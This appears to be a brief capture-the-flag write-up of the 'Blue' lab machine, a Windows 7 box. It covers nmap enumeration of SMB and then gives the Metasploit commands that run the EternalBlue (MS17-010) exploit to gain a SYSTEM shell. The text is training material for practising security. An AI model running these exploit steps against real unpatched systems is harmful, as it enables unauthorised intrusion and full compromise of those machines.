IP: 10.10.10.40
OS: Windows 7
Enumeration
Blue is a entry level box. We are going to use metasploit to get SYSTEM shell. Eternal blue is part of the tools released by The Shadow Brokers group to exploit SMB.
Nmap scan reveals that there are a bunch of open ports and of interest will be ports 137, 139 and 445.
We see that smb 2.02 is running and this can be exploited because of the eternal blue vulnerability which is confirmed by a nmap script scan.
Exploitation
Next we start msfconsole and load the metasploit framework for exploitation using the eternal blue exploit.
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) >run
And we get the keys to the kingdom-NT AUTHORITY SYSTEM !! Like I said, this was a easy and boring challenge lol
Comments
Post a Comment